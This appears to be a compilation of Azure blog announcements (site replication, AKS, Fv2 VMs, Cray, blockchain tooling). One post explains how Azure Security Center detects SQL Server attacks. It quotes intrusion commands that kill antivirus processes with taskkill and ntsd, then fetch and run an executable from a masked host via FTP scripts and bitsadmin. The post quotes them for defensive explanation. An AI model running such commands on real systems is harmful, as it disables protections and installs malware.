One-click replication for Azure Virtual Machines with Azure Site Recovery

We are happy to announce that Azure Site Recovery (ASR) is now built into the virtual machine experience so that you can setup replication in one click for your Azure virtual machines. Combined with ASR’s one-click failover capabilities, its simpler than ever before to setup replication and test a disaster recovery scenario.

Using the one-click replication feature, now in public preview, is very simple. Just browse to your VM, select Disaster recovery, select the target region of your choice, review the settings and click Enable replication. That’s it – disaster recovery for your VM is configured. The target resource group, availability set, virtual network and storage accounts are auto-created based on your source VM configuration. You also have the flexibility to pick custom target settings. You can refer to the animation below for the flow.

If you have applications running on Azure IaaS virtual machines, your applications still have to meet compliance requirements. While the Azure platform already has built-in protection for localized hardware failures, you still need to safeguard your applications from major incidents. This includes catastrophic events such as hurricanes and earthquakes, or software glitches causing application downtime. Using Azure Site Recovery, you can have peace of mind knowing your business-critical applications running on Azure VMs are covered and without the expense of secondary infrastructure. Disaster recovery between Azure regions is available in all Azure regions where ASR is available. Get started with Azure Site Recovery today.

Related links and additional content

Get started by configuring disaster recovery for Azure VMs
Learn more about the supported configurations for replicating Azure VMs
Need help? Reach out to Azure Site Recovery forum for support
Tell us how we can improve Azure Site Recovery by contributing new ideas and voting up existing ones

Quelle: Azure

Azure powers the industrial Internet

We know that every business is different, but the cloud is foundational to digital transformation. We’re proud that Azure has been at the forefront of helping companies across industries transform. Today, Satya Nadella is sharing the stage with GE’s CEO at Minds + Machines to talk about GE’s transformation and how we’re partnering to help customers around the world accelerate their own transformation.

As we think about the industrial companies of the future, we know there is a huge opportunity to gain insights that will have true business impact. Connecting industrial assets to the cloud enables the creation of a digital feedback loop that helps customers to unlock actionable intelligence from machinery and equipment like wind turbines, jet engines and refrigeration systems.

The industrial internet is changing the way businesses fundamentally operate. We believe that IoT is not a technology revolution, but a business revolution enabled by technology. Think about the advantages of being able to predict when equipment failure might happen and getting in front of it versus dealing with the consequences. It directly impacts the bottom line if you can avoid unplanned downtime, extend equipment life, increase production value and generate higher yields.

At Microsoft, we believe in customer choice and enabling a rich ecosystem of offerings for our customers. In that spirit, we’re pleased to announce that starting November 30, GE’s Predix platform will be available on Azure – the leading cloud for enterprises. This enables Predix to take advantage of Azure’s differentiated capabilities, from enterprise-grade security, to more regions worldwide, to a larger compliance portfolio, to national clouds for the highest level of data sovereignty, to industry leading hybrid capabilities – and more.

We’re committed to helping businesses of all sizes realize their full potential, so customers interested in learning more about our partnership with GE, please contact Erik Sevenants, director of partner development at Microsoft.
Quelle: Azure

How Azure Security Center automates the detection of cyber attack

Earlier this year, Greg Cottingham wrote a great article breaking down an example of an Azure Security Center detected attack against SQL Server. In this post, we'll go into more detail on the way that security center analyzes data at-scale to detect these types of attacks, and how the output from these approaches can be used to pivot to other intrusions that share some common techniques.

With attack techniques rapidly evolving, many organizations are struggling to keep pace. This is exacerbated by a scarcity of security talent, and companies can no longer rely solely on detections written by human beings. By baking the intuition of human security analysts inside algorithms, Azure Security Center can automatically adapt to changing attack patterns.

Let’s look at how security center uses this approach to detect attacks against SQL Server. By analyzing processes executed by the MSSQLSERVER account, we see it is very stable under normal circumstances – it performs a fixed set of actions, almost all the time. The stability of this account allows us to build a model that will detect anomalous activity that occurs when it is experiencing an attack.

Building a model

Before security center can construct a model of this data, it performs some pre-processing to collapse process executions that run out of similar directories. Otherwise, the model would see these as different processes. It uses a distance function over the process directory to cluster, and then aggregate prevalence where a process name is shared. An example of this process can be seen below.

This can be reduced to the single summarized state:

It also manipulates the data to capture hosted executions such as regsvr32.exe and rundll32.exe that may be common in themselves, but can be used to run other files. By treating the file that was run as an execution in its own right, insight is gained into any code that was run by this mechanism.

With this normalized data, the Azure Security Center detection engine can plot the prevalence of processes executed by MSSQLSERVER in a subscription. Due to the stability of this account, this simple approach produces a robust model of normal behavior by process name and location. A visualization of this model can be seen in the graph below.

Finding anomalies

When an attack surface like SQL Server is targeted, an attacker’s first few actions are highly constrained. They can try various tactics, which all leave a trail of process execution events. In the example below, we show the same model built by security center using data from a subscription at a time it experienced a SQL Server attack. This time, it finds anomalies in the tail of low prevalence executions that contain some interesting data.

Let's take a deeper look at some of the unusual executions identified by the model:

taskkill /im 360rp.exe /f
taskkill /im 360sd.exe /f
taskkill /im 360rps.exe /f
ntsd -c q -pn 360rp.exe
ntsd -c q -pn 360sd.exe
ntsd -c q -pn 360rps.exe

In the first phase, we see several attempts to disable the anti-virus engine running on the host. The first uses the built-in tool taskkill to end the process. The second uses a debugger, ‘ntsd’ to attach to the process it wishes to disrupt with the –pn argument and executes the command ‘q’ once it has successfully attached to the target. The ‘q’ command causes the debugger to terminate the target application.

With the anti-virus engine disabled, the attacker is free to download and run its first stage from the internet. It does this in a couple of different ways:

The first is over the FTP protocol. We see the attacker use the echo command to write a series of FTP commands to a file:

echo open xxx.xxx.xxx.xxx>So.2
echo 111>>So.2
echo 000>>So.2
echo get Svn.exe >>So.2
echo bye

The commands are then executed:

ftp -s:So.2

The file is deleted, and the executable is run:

del So.2
Svn.exe

In case this method of downloading the executable fails, the attack falls back to a secondary mechanism of fetching the file, from the same address this time over HTTP:

bitsadmin /transfer n http://xxx.xxx.xxx.xxx:xxxx/Svn.exe c:UsersPublicSvn.exe"

Here we see the attacker downloading the executable file from the internet using the bitsadmin tool.

Using machine learning, Azure Security Center alerts on anomalous activity like this – all without specialist knowledge or human intervention. Here is how one of these alerts looks inside Azure Security Center:

Mining the output

Although this approach is limited to detecting attacks in a very specific scenario, it also acts as a detection factory, automating the discovery of new techniques used by attackers.
 
Let’s look again at the bitsadmin example:
 
bitsadmin  /transfer n http://xxx.xxx.xxx.xxx:xxxx/xxx.exe c:UsersPublicxxx.exe"
 
On close inspection, this looks like a general technique that attackers can use to execute a remote file using a built-in capability of the operating system, but it was surfaced to us by an algorithm rather than a security expert.

While the legitimate use of bitsadmin is common, the remote location, job name and the destination directory of the executable are suspicious. This provides the basis for a new detection, specifically targeted at unusual bitsadmin executions, independent of whether or not they are run by the MSSQLSERVER account.
 
Thus, bitsadmin and other alerts generated by this approach can be mined for suitability as standalone detection opportunities. They, in turn, alert customers to other attacks that occur on their subscriptions where some common techniques are shared by another attack vector.

Summary

By using Azure Security Center, customers with SQL Server deployments automatically benefit from this approach to detection. Because it is anomaly based, it adapts to changing tactics, alerting of new attacks without involvement from a human expert. The new techniques captured by this approach generate detection opportunities, that feedback into protecting all security center customers.

For more information on the types of attacks mentioned in this article and how to mitigate them, see the blog, "How Azure Security Center helps reveal a Cyberattack."

To learn more about detection in Azure Security Center, see the following:

Azure Security Center’s detection capabilities
Managing and responding to security alerts in Azure Security Center

Quelle: Azure

Blk.io brings an ERC-20 token service using Quorum to Azure

blk.io has been hard at work on products to support the enterprise build applications powered by blockchain. This includes driving the web3j group of projects. They have also built a service for creating and managing ERC-20 tokens on top of Quorum. This service, of course, is leveraging web3j, a RESTful service, and Spring Boot.

web3j – connecting Java applications to the Ethereum blockchain

web3j is the core library of the web3j group of projects, which provide open source libraries for working with Ethereum blockchains on the JVM. In addition to Ethereum, there are integrations for Quorum, and the widely-used Spring Boot framework for production-grade applications.

blk.io sponsors the ongoing development of web3j and other related projects. It is working with a number of financial firms on the development of their blockchain applications and provides both support and training for enterprises wishing to work with Ethereum and Quorum. To get started with web3j, check out the official documentation.

ERC-20 token service

The service provides a well-documented API that users can use to interact and use the service, making it trivial to build a solution using the industry standard for digital tokens.

As users continue to build systems powered by the enterprise-class blockchains such as Quorum, the additions of services, such as this token service, help to speed up delivery of these next-generation applications. To get started using this service, create an instance from the Azure Marketplace. A detailed walkthrough is available to help users get started with the offering.
Quelle: Azure

Introducing AKS (managed Kubernetes) and Azure Container Registry improvements

Today, we are proud to announce the preview of AKS (Azure Container Service), our new managed Kubernetes service. We have seen customers fall in love with our current Kubernetes support on Azure Container Service, currently known as ACS, which has grown 300% in the last six months. Now with the preview of AKS, we are making it even easier to manage and operate your Kubernetes environments, all without sacrificing portability. This new service features an Azure-hosted control plane, automated upgrades, self-healing, easy scaling, and a simple user experience for both developers and cluster operators. With AKS, customers get the benefit of open source Kubernetes without complexity and operational overhead.

Notice in the demo below how easy it is to provision a new AKS cluster, upgrade the cluster from Kubernetes 1.7.7 to 1.8.1, and scale the cluster from 3 to 10 nodes.

To help you get started, AKS is free. You only pay for the VMs that add value to your business. Unlike other cloud providers who charge an hourly rate for the management infrastructure, with AKS you will pay nothing for the management of your Kubernetes cluster, ever. After all, the cloud should be about only paying for what you consume. View a video on why AKS is right for you and try AKS for free today. 

While Azure Container Service has been available since 2015 with support for multiple container orchestrators, these new features and innovative pricing are focused on Kubernetes, which has emerged as the open source standard for container orchestration. Kubernetes unique community involvement and its portability makes it an ideal orchestrator to standardize on. This comes as no surprise to Microsoft. Brendan Burns, co-creator of Kubernetes, now leads Azure’s container efforts. Earlier this year Microsoft acquired Deis, a company at the center of Kubernetes innovation. More than ever, Microsoft is contributing upstream to Kubernetes and developing innovative software like Draft to make Kubernetes easier to use for developers.  Given this deepening focus on Kubernetes, we will refer to our managed Kubernetes service as AKS.

For example, here is how you can easily create a new Kubernetes cluster using the Azure CLI:

az aks create –n myCluster –g myResourceGroup

We also see continued interest in other orchestrator deployments such as Docker Enterprise and Mesosphere DC/OS, including MetLife and ESRI.  As a result, we will continue to support the existing ACS deployment engine in Azure for simple creation of popular open source container solutions. To address the needs of our mutual customers, we are continuing to work with Docker and Mesosphere to offer enhanced integration of their enterprise offers in our Azure Marketplace. The Azure Marketplace provides the same easy deployment as ACS, while adding easy in-place upgrades to enterprise editions, which offer value-added commercial features and 24×7 support.

In addition to the launch of AKS, we’re announcing today the general availability of managed SKUs Azure Container Registry (ACR). ACR provides a private registry that scales to your needs through three new sizes. To provide scale across the global footprint of Azure, we’re also announcing the preview of ACR geo-replication. Through the click of a map, customers can now manage a single registry, replicated across any number of regions. Any push/pull of a container image to ACR will be routed to the closest registry. ACR geo-replication enables customers to manage their global deployments as one entity. Geo-replication is a first of its kind feature catering to customers who operate at global scale, further separating Azure from competitors with much smaller global footprints. View a video showing how you can leverage geo-replication and deploy regions as images arrive.

This is an exciting moment for Azure and our customers. We look forward to both customers and partners building atop our new managed Kubernetes service.
Quelle: Azure

Truffle 4.0 beta 2 now available on Azure

Truffle has created a toolset used by developers building decentralized applications on the Ethereum blockchain. While other tools exist, Truffle focuses on the developer experience and the unique needs of developing on a blockchain that are not present in traditional software development.  Providing the ability to manage the lifecycle of the development and deployment process via a framework has been delivered by Truffle and the evolution of the product is being realized in the new features, such as those listed below.

We are excited to announce that, in addition to the latest stable version of Truffle, the upcoming beta release of Truffle 4.0 beta 2 is now available in the Azure Marketplace. The drive to improve the developer experience is central to tools such as Truffle. The beta offers a significant upgrade and this new offering showcases the features that are being developed as part of the framework, including:

No need to run testrpc for faster development cycles
Step through debugging of transactions in Smart Contracts
The ability to have multiple concurrent development sessions active
Logging in the new development blockchain (without the need to use testrpc)
New solidity compilier 0.4.17
Migration and deployment dry runs to allow testing upgrades before actual deployment

All of the details can be found on GitHub. Also, join in the conversation on the Truffle Gitter channel as well!

Along with this, Truffle moved the application build process to a model which is more modular. This has been in place since version 3.0 and example "boxes" or boilerplates for applications are available for users to help bootstrap the application development process. A list of these boxes can be found on the Truffle website. 

Truffle continues to provide a development environment that makes building decentralized applications as easy as web development. To get started with the beta, create an instance in Azure from the Marketplace.
Quelle: Azure

Last week in Azure: Cloud Service Map, Azure Red Shirt Dev Tour, & more

Here are the five things to know from last week in Azure:

1. Translating AWS to Azure with the Cloud Service Map

"And you know what they call a Quarter Pounder with Cheese in Paris?"

One of the challenges of living in a multi-cloud world is understanding all the little differences among them. Last week we published the Cloud Service Map for AWS and Azure, which will help you identify the equivalent services in one cloud when you know what it's called in the other. Of course, there are some services you'll only find in one or the other for which there is no equivalent at this time. Download a PDF of the Cloud Service Map for AWS and Azure. To learn more, see: Cloud Service Map for AWS and Azure Available Now.

2. Azure Red Shirt Dev Tour '17

Last week, Microsoft's cloud chief, Scott Guthrie, toured Chicago, Dallas, Atlanta, Boston, and New York City to write code live and demonstrate how Azure can help you solve some of your most complex developer problems. We live-streamed the full five hours of his final show in New York for online audiences and captured it for on-demand viewing. On the Microsoft Developer site, you can find a list of the demos that Scott did on the tour along with links to help you locate them in the documentation.

3. New Azure Government Capabilities

Azure offers a comprehensive set of compliance offerings to help you comply with national, regional, and industry-specific requirements governing the collection and use of individuals’ data. Our government customers are responsible for the most sensitive data and the most critical applications in the country. Azure Government is the mission-critical cloud, providing more than 7,000 Federal, State, and local customers the exclusivity, highest compliance and security, hybrid flexibility, and commercial-grade innovation they need to better meet citizen expectations.

Last week at Microsoft Government Cloud Forum in Washington D.C., we announced several important advances for Azure Government, including:

Introducing Azure Government Secret – multi-tenant cloud infrastructure and cloud capabilities to U.S. Federal Civilian, Department of Defense, Intelligence Community, and U.S. Government partners working within Secret enclaves.
Blockchain for Azure Government – support for a wide array of our Azure blockchain and distributed ledger marketplace solutions, which automate the deployment and configuration of blockchain infrastructure across multiple organizations, allowing our customers to focus on government transformation and application development.
Unified security management with Azure Security Center – a unified security management and advanced threat protection for hybrid cloud workloads, enabling government agencies to take on evolving security threats.
Expanding High Performance Computing in Azure Government – Azure H-series virtual machines, with InfiniBand and Linux RDMA technology, are designed to deliver cutting-edge performance for complex engineering and scientific workloads such as weather prediction and climate modeling, trajectory modeling, and other memory-intensive projects.
New Virtual Desktop Infrastructure options in the cloud – extend existing Citrix environments and deploy Windows 10 desktops into Azure Government from Citrix Cloud.

To learn more, see: Announcing new Azure Government capabilities for classified mission-critical workloads.

4. New Previews on Azure

Azure Service Bus and Azure Event Hubs Geo-disaster recovery – Azure Service Bus and Azure Event Hubs just released a preview of an upcoming generally available Geo-disaster recovery feature.

Azure Data Factory v2: visual monitoring added – easily monitor Azure Data Factory v2 pipelines without writing a single line of code.

Azure Cosmos DB in Azure Storage Explorer – explore and manage Azure Cosmos DB databases with the same consistent user experiences that make Azure Storage Explorer a powerful developer tool for managing Azure storage.

5. Weekly Azure Shows

Hybrid Storage with Azure File Sync – Klaas Langhout joins Scott Hanselman on Azure Friday to show Azure File Sync for centralizing file services into Azure, which reduces the cost and complexity of managing islands of data while preserving existing app compatibility and performance. In addition, it provides multi-site access to the same data, tiering of less frequently used data off-premise, and integrated backup and rapid restoration.

Azure API Management: New UI & Mocks – Anton Babadjanov joins Scott Hanselman on Azure Friday to discuss the new redesigned administrative UI for API Management. Also, see how it enables a design-first approach with the ability to produce simulated (mocked) API responses.

The Azure Podcast: SQL on Linux – Bob Ward, Principal Architect on the SQL Server Team, talks about the release of SQL Server on Linux, which is available in Azure and on-premises.

Cloud Tech 10 – AWS Cloud Service Map, Bing Custom Search, Cosmos DB and more!

Quelle: Azure

Transactional replication to Azure SQL Database is now generally available

We are excited to announce that transactional replication to Azure SQL Database is now generally available (GA). This feature allows you to migrate your on-premises SQL Server databases to Azure SQL Databases with minimal downtime.

You can configure your on-premises SQL Server databases that you wish to migrate as publisher and configure your Azure SQL Database as push subscriber to the SQL Server instance. The transactional replication distributor synchronizes data from the publisher to the subscriber. All changes to your data and schema will show up in your Azure SQL Database. Once the synchronization is completed, and you are ready to migrate, change the connection string of your applications to point them to your Azure SQL Database.

You can also use transactional replication to migrate a subset of your source database. The publication that you replicate to Azure SQL Database can be limited to a subset of the tables in the database being replicated. For each table being replicated, you can limit the data to a subset of the rows and/or a subset of the columns.

Please see SQL Server database migration to SQL Database in the cloud for more details.

Transactional replication can also be used to synchronize your data from on-premises SQL Server to Azure SQL Databases in one direction. To synchronize data in bi-direction or from Azure SQL Database, see following the document for more options: Sync data across multiple cloud and on-premises databases with SQL Data Sync.
Quelle: Azure

Fv2 VMs are now available, the fastest VMs on Azure

Today, I’m excited to announce the general availability of our new Fv2 VM family. Azure now offers the fastest Intel® Xeon® Scalable processor, code-named Skylake, in the public cloud. In Azure, we have seen growing demand for massive large-scale computation by customers doing financial modeling, scientific analysis, genomics, geothermal visualization, and deep learning. Our drive to continuously innovate in Azure allows us to offer cost effective and best-in-class hardware for these world-changing workloads. Recent announcements of ND, offering the first Tesla P40s in the public cloud, NCv2, offering Tesla P100s, and the only cloud with InfiniBand connectivity, Azure enables amazing, scale-out, GPU-powered calculations. Now, with the Fv2, Azure offers the fastest CPU-powered calculations on the Intel Skylake processor.

These VM sizes are hyper-threaded and run on the Intel® Xeon® Platinum 8168 processor, featuring a base core frequency of 2.7 GHz and a maximum single-core turbo frequency of 3.7 GHz. Intel® AVX-512 instructions, which are new on Intel Scalable Processors, will provide up to a 2X performance boost to vector processing workloads on both single and double precision floating point operations. In other words, they are really fast for any computational workload. The closest cloud competitor offering Skylake currently only offers 2.0 GHz. This makes Azure the best place for computationally-intensive workloads, with the newest and best tools for the job.

The Fv2 VMs will be available in 7 sizes, with the largest size featuring 72 vCPUs and 144 GiB of RAM. These sizes will support Azure premium storage disks by default and will also support accelerated networking capabilities for the highest throughput of any cloud and ultra-low VM to VM latencies. With the best performance to price ratio on Azure, Fv2 VMs are a perfect fit for your compute intensive workloads. 

Here are the details on these new Fv2 VM sizes:

Size

vCPUs

Memory:
GiB

Local SSD:
GiB

Max cached and local disk IOPS (cache size in GiB)

Max. data disks (1023 GB each)

Max.NICs 

Standard_F2s_v2
2
4 GiB
16
4000 (32)
4
2

Standard_F4s_v2
4
8 GiB
32
8000 (64)
8
2

Standad_F8s_v2
8
16 GiB
64
16000 (128)
16
4

Standard_F16s_v2
16
32GiB
128
32000 (256)
32
8

Standard_F32s_v2
32
64GiB
256
64000 (512)
32
8

Standard_F64s_v2
64
128GiB
512
128000 (1024)
32
8

Standard_F72s_v2
72
144GiB
576
144000 (2048)
32
8

 

Starting today, these sizes are available in West US 2, West Europe, and East US. Southeast Asia is coming soon. I hope you enjoy these new sizes and I am excited to see what you will do with them!! 

See ya around, 
Corey
Quelle: Azure

Cray Supercomputers are coming to Azure

I’m thrilled to share our new, exclusive partnership with Cray that will provide our customers unprecedented access to supercomputing capabilities in Azure to solve their toughest challenges in climate modeling, precision medicine, energy, manufacturing, and other scientific research.

This announcement is yet another step to help our customers harness the power of HPC and AI in an agile and cost-effective way. At Microsoft, we believe access to Big Computing capabilities in the cloud has the power to transform many businesses and will be at the forefront of breakthrough experimentation and innovation in the decades to come. We’ve already made significant investments to support this vision over the last several years, including industry-leading network performance with InfiniBand, our recent acquisition of Cycle Computing to simplify management of hybrid HPC deployments, and our recent announcements around bringing leading edge GPUs to the public cloud.

Microsoft and Cray are working together to bring customers the right combination of extreme performance, scalability, and elasticity. Customers can get a dedicated Cray XC or CS series supercomputers in Azure to run HPC and AI applications alongside their other cloud workloads directly on the Azure network. The Cray systems easily integrate with Azure Virtual Machines, Azure Data Lake storage, the Microsoft AI platform, and Azure Machine Learning services for rich workflows and collaboration. All of this provided in the cloud with the most datacenters worldwide, the most compliance certifications, and dedicated regions for government agencies and their partners.

Only this partnership with Microsoft and Cray allows customers to run a broad array of hybrid workflows in the cloud, and be fully supported by the experts in enterprise cloud and HPC.

To learn more about this offering, please see our press release or visit the Cray website.
Quelle: Azure